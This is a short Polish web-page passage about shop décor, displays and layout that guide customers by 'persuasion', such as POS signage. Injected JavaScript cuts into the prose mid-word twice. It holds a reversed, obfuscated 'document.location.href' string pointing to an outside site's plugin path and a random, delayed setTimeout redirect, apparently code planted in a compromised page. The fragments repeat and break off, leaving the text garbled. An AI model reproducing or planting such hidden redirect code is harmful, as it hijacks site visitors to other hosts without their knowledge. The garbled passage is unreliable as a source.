To elementy wystroju, ekspozycji i układu sklepu, budujące w nim wyjątkową atmosferę i sterujące Klientem me toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}todą „perswazji”. W przypadku elementów „miękkich” Klient może, ale nie musi nas posłuchać. Należą toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do nich takie składniki Konceptu Handlowego jak POS (system sygnalizacji w sklepie) czy „umajenie”.